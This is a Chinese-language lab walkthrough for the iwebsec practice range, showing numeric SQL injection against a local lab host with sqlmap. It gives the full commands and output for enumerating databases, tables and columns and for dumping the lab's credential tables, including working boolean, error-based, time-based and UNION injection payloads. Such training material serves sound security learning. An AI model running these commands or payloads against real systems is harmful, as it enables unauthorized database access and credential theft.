iwebsec_wp

前言

• 在线靶场：点击此处即可到达靶场地址-->>>iwebsec
  
  

2.本地搭建：使用官方所介绍的方法 点击跳转官网
iwebsec官网
（1）docker hub下载，命令 docker pull iwebsec/iwebsec
（2）VMware虚拟机环境下载地址链接:https://pan.baidu.com/s/1ChCilzFPSedlA_Hv4NMkPA?pwd=0aib 提取码: 0aib
iwebsec靶场配套书籍《Web安全原理分析与实践》
这里更加推荐使用本地环境。
sql注入漏洞

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。
数字型注入


打开靶场注入点已给出

/01.php?id=1
sqlmap

使用sqlmap判断是否存在漏洞

sqlmap -u http://192.168.70.157/sqli/01.php?id=1
点击查看代码

1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1
2.         ___
3.        __H__
4. ___ ___[(]_____ ___ ___  {1.2.3#stable}
5. |_ -| . [,]     | .'| . |
6. |___|_  [(]_|_|_|__,|  _|
7.       |_|V          |_|   http://sqlmap.org
9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
11. [*] starting at 21:28:48
13. [21:28:48] [INFO] resuming back-end DBMS 'mysql'
14. [21:28:48] [INFO] testing connection to the target URL
15. sqlmap resumed the following injection point(s) from stored session:
16. ---
17. Parameter: id (GET)
18.     Type: boolean-based blind
19.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
20.     Payload: id=1 OR NOT 1065=1065#
22.     Type: error-based
23.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
24.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
26.     Type: AND/OR time-based blind
27.     Title: MySQL >= 5.0.12 AND time-based blind
28.     Payload: id=1 AND SLEEP(5)
30.     Type: UNION query
31.     Title: Generic UNION query (NULL) - 3 columns
32.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
33. ---
34. [21:28:48] [INFO] the back-end DBMS is MySQL
35. web server operating system: Linux CentOS 6.8
36. web application technology: Apache 2.2.15, PHP 5.2.17
37. back-end DBMS: MySQL >= 5.0
38. [21:28:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
40. [*] shutting down at 21:28:48

复制代码

爆数据库名

记录sqlmap的使用方法
命令如下
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --dbs
点击查看代码

1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --dbs
2.         ___
3.        __H__
4. ___ ___[(]_____ ___ ___  {1.2.3#stable}
5. |_ -| . ["]     | .'| . |
6. |___|_  [)]_|_|_|__,|  _|
7.       |_|V          |_|   http://sqlmap.org
9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
11. [*] starting at 21:24:43
13. [21:24:43] [INFO] resuming back-end DBMS 'mysql'
14. [21:24:43] [INFO] testing connection to the target URL
15. sqlmap resumed the following injection point(s) from stored session:
16. ---
17. Parameter: id (GET)
18.     Type: boolean-based blind
19.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
20.     Payload: id=1 OR NOT 1065=1065#
22.     Type: error-based
23.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
24.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
26.     Type: AND/OR time-based blind
27.     Title: MySQL >= 5.0.12 AND time-based blind
28.     Payload: id=1 AND SLEEP(5)
30.     Type: UNION query
31.     Title: Generic UNION query (NULL) - 3 columns
32.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
33. ---
34. [21:24:43] [INFO] the back-end DBMS is MySQL
35. web server operating system: Linux CentOS 6.8
36. web application technology: Apache 2.2.15, PHP 5.2.17
37. back-end DBMS: MySQL >= 5.0
38. [21:24:43] [INFO] fetching database names
39. available databases [3]:
40. [*] information_schema
41. [*] iwebsec
42. [*] test
44. [21:24:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
46. [*] shutting down at 21:24:43

复制代码

爆数据库列名

这里以iwebsec为例
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec --tables
点击查看代码

1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec --tables
2.         ___
3.        __H__
4. ___ ___[.]_____ ___ ___  {1.2.3#stable}
5. |_ -| . [(]     | .'| . |
6. |___|_  [(]_|_|_|__,|  _|
7.       |_|V          |_|   http://sqlmap.org
9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
11. [*] starting at 21:31:12
13. [21:31:12] [INFO] resuming back-end DBMS 'mysql'
14. [21:31:12] [INFO] testing connection to the target URL
15. sqlmap resumed the following injection point(s) from stored session:
16. ---
17. Parameter: id (GET)
18.     Type: boolean-based blind
19.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
20.     Payload: id=1 OR NOT 1065=1065#
22.     Type: error-based
23.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
24.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
26.     Type: AND/OR time-based blind
27.     Title: MySQL >= 5.0.12 AND time-based blind
28.     Payload: id=1 AND SLEEP(5)
30.     Type: UNION query
31.     Title: Generic UNION query (NULL) - 3 columns
32.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
33. ---
34. [21:31:12] [INFO] the back-end DBMS is MySQL
35. web server operating system: Linux CentOS 6.8
36. web application technology: Apache 2.2.15, PHP 5.2.17
37. back-end DBMS: MySQL >= 5.0
38. [21:31:12] [INFO] fetching tables for database: 'iwebsec'
39. Database: iwebsec
40. [4 tables]
41. +-------+
42. | user  |
43. | sqli  |
44. | users |
45. | xss   |
46. +-------+
48. [21:31:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
50. [*] shutting down at 21:31:13

复制代码

爆字段

这里可以看到有user，sqli，users，xss的表，接下来就是直接爆字段这里以user表为例
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user --columns
点击查看代码

1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user --columns
2.         ___
3.        __H__
4. ___ ___[)]_____ ___ ___  {1.2.3#stable}
5. |_ -| . [.]     | .'| . |
6. |___|_  [.]_|_|_|__,|  _|
7.       |_|V          |_|   http://sqlmap.org
9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
11. [*] starting at 21:33:41
13. [21:33:42] [INFO] resuming back-end DBMS 'mysql'
14. [21:33:42] [INFO] testing connection to the target URL
15. sqlmap resumed the following injection point(s) from stored session:
16. ---
17. Parameter: id (GET)
18.     Type: boolean-based blind
19.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
20.     Payload: id=1 OR NOT 1065=1065#
22.     Type: error-based
23.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
24.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
26.     Type: AND/OR time-based blind
27.     Title: MySQL >= 5.0.12 AND time-based blind
28.     Payload: id=1 AND SLEEP(5)
30.     Type: UNION query
31.     Title: Generic UNION query (NULL) - 3 columns
32.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
33. ---
34. [21:33:42] [INFO] the back-end DBMS is MySQL
35. web server operating system: Linux CentOS 6.8
36. web application technology: Apache 2.2.15, PHP 5.2.17
37. back-end DBMS: MySQL >= 5.0
38. [21:33:42] [INFO] fetching columns for table 'user' in database 'iwebsec'
39. Database: iwebsec
40. Table: user
41. [3 columns]
42. +----------+--------------+
43. | Column   | Type         |
44. +----------+--------------+
45. | id       | int(11)      |
46. | password | varchar(255) |
47. | username | varchar(255) |
48. +----------+--------------+
50. [21:33:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
52. [*] shutting down at 21:33:42

复制代码

获取该字段中的信息

获取id账号密码信息
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user -C id,password,username --dump
点击查看代码

1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user -C id,password,username --dump
2.         ___
3.        __H__
4. ___ ___[)]_____ ___ ___  {1.2.3#stable}
5. |_ -| . ["]     | .'| . |
6. |___|_  [,]_|_|_|__,|  _|
7.       |_|V          |_|   http://sqlmap.org
9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
11. [*] starting at 21:41:40
13. [21:41:40] [INFO] resuming back-end DBMS 'mysql'
14. [21:41:40] [INFO] testing connection to the target URL
15. sqlmap resumed the following injection point(s) from stored session:
16. ---
17. Parameter: id (GET)
18.     Type: boolean-based blind
19.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
20.     Payload: id=1 OR NOT 1065=1065#
22.     Type: error-based
23.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
24.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
26.     Type: AND/OR time-based blind
27.     Title: MySQL >= 5.0.12 AND time-based blind
28.     Payload: id=1 AND SLEEP(5)
30.     Type: UNION query
31.     Title: Generic UNION query (NULL) - 3 columns
32.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
33. ---
34. [21:41:40] [INFO] the back-end DBMS is MySQL
35. web server operating system: Linux CentOS 6.8
36. web application technology: Apache 2.2.15, PHP 5.2.17
37. back-end DBMS: MySQL >= 5.0
38. [21:41:40] [INFO] fetching entries of column(s) 'id, password, username' for table 'user' in database 'iwebsec'
39. Database: iwebsec
40. Table: user
41. [3 entries]
42. +----+----------+----------+
43. | id | password | username |
44. +----+----------+----------+
45. | 1  | pass1    | user1    |
46. | 2  | pass2    | user2    |
47. | 3  | pass3    | user3    |
48. +----+----------+----------+
50. [21:41:40] [INFO] table 'iwebsec.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/user.csv'
51. [21:41:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
53. [*] shutting down at 21:41:40

复制代码

获取数据库所有用户信息

sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --users
点击查看代码

1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --users
2.         ___
3.        __H__
4. ___ ___[(]_____ ___ ___  {1.2.3#stable}
5. |_ -| . [,]     | .'| . |
6. |___|_  [.]_|_|_|__,|  _|
7.       |_|V          |_|   http://sqlmap.org
9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
11. [*] starting at 21:44:37
13. [21:44:37] [INFO] resuming back-end DBMS 'mysql'
14. [21:44:37] [INFO] testing connection to the target URL
15. sqlmap resumed the following injection point(s) from stored session:
16. ---
17. Parameter: id (GET)
18.     Type: boolean-based blind
19.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
20.     Payload: id=1 OR NOT 1065=1065#
22.     Type: error-based
23.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
24.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
26.     Type: AND/OR time-based blind
27.     Title: MySQL >= 5.0.12 AND time-based blind
28.     Payload: id=1 AND SLEEP(5)
30.     Type: UNION query
31.     Title: Generic UNION query (NULL) - 3 columns
32.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
33. ---
34. [21:44:37] [INFO] the back-end DBMS is MySQL
35. web server operating system: Linux CentOS 6.8
36. web application technology: Apache 2.2.15, PHP 5.2.17
37. back-end DBMS: MySQL >= 5.0
38. [21:44:37] [INFO] fetching database users
39. database management system users [1]:
40. [*] 'iwebsec'@'localhost'
42. [21:44:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
44. [*] shutting down at 21:44:37

复制代码

直接枚举数据库信息

--current-db可以查看网站使用的当前数据库
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --current-db --dump --batch
点击查看代码

1. root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --current-db --dump --batch
2.         ___
3.        __H__
4. ___ ___["]_____ ___ ___  {1.2.3#stable}
5. |_ -| . [)]     | .'| . |
6. |___|_  [']_|_|_|__,|  _|
7.       |_|V          |_|   http://sqlmap.org
9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
11. [*] starting at 21:26:09
13. [21:26:09] [INFO] resuming back-end DBMS 'mysql'
14. [21:26:09] [INFO] testing connection to the target URL
15. sqlmap resumed the following injection point(s) from stored session:
16. ---
17. Parameter: id (GET)
18.     Type: boolean-based blind
19.     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
20.     Payload: id=1 OR NOT 1065=1065#
22.     Type: error-based
23.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
24.     Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
26.     Type: AND/OR time-based blind
27.     Title: MySQL >= 5.0.12 AND time-based blind
28.     Payload: id=1 AND SLEEP(5)
30.     Type: UNION query
31.     Title: Generic UNION query (NULL) - 3 columns
32.     Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
33. ---
34. [21:26:09] [INFO] the back-end DBMS is MySQL
35. web server operating system: Linux CentOS 6.8
36. web application technology: Apache 2.2.15, PHP 5.2.17
37. back-end DBMS: MySQL >= 5.0
38. [21:26:09] [INFO] fetching current database
39. current database:    'iwebsec'
40. [21:26:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
41. [21:26:09] [INFO] fetching current database
42. [21:26:09] [INFO] fetching tables for database: 'iwebsec'
43. [21:26:09] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
44. [21:26:09] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
45. Database: iwebsec
46. Table: sqli
47. [7 entries]
48. +----+-----------------------+------------------------------------------------------+----------+
49. | id | email                 | username                                             | password |
50. +----+-----------------------+------------------------------------------------------+----------+
51. | 1  | user1@iwebsec.com     | user1                                                | pass1    |
52. | 2  | user2@iwebsec.com     | user2                                                | pass2    |
53. | 3  | user3@iwebsec.com     | user3                                                | pass3    |
54. | 4  | user4@iwebsec.com     | admin                                                | admin    |
55. | 5  | 123@123.com           | 123                                                  | 123      |
56. | 6  | 1234@123.com          | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    | 123      |
57. | 7  | iwebsec02@iwebsec.com | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# | 123456   |
58. +----+-----------------------+------------------------------------------------------+----------+
60. [21:26:09] [INFO] table 'iwebsec.sqli' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/sqli.csv'
61. [21:26:09] [INFO] fetching columns for table 'xss' in database 'iwebsec'
62. [21:26:09] [INFO] fetching entries for table 'xss' in database 'iwebsec'
63. Database: iwebsec
64. Table: xss
65. [1 entry]
66. +----+---------+
67. | id | name    |
68. +----+---------+
69. | 1  | iwebsec |
70. +----+---------+
72. [21:26:09] [INFO] table 'iwebsec.xss' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/xss.csv'
73. [21:26:09] [INFO] fetching columns for table 'user' in database 'iwebsec'
74. [21:26:09] [INFO] fetching entries for table 'user' in database 'iwebsec'
75. Database: iwebsec
76. Table: user
77. [3 entries]
78. +----+----------+----------+
79. | id | username | password |
80. +----+----------+----------+
81. | 1  | user1    | pass1    |
82. | 2  | user2    | pass2    |
83. | 3  | user3    | pass3    |
84. +----+----------+----------+
86. [21:26:09] [INFO] table 'iwebsec.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/user.csv'
87. [21:26:09] [INFO] fetching columns for table 'users' in database 'iwebsec'
88. [21:26:09] [INFO] fetching entries for table 'users' in database 'iwebsec'
89. Database: iwebsec
90. Table: users
91. [1 entry]
92. +-------+----------+-------------+
93. | role  | username | password    |
94. +-------+----------+-------------+
95. | admin | orange   | mall123mall |
96. +-------+----------+-------------+
98. [21:26:09] [INFO] table 'iwebsec.users' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/users.csv'
99. [21:26:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
101. [*] shutting down at 21:26:09

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！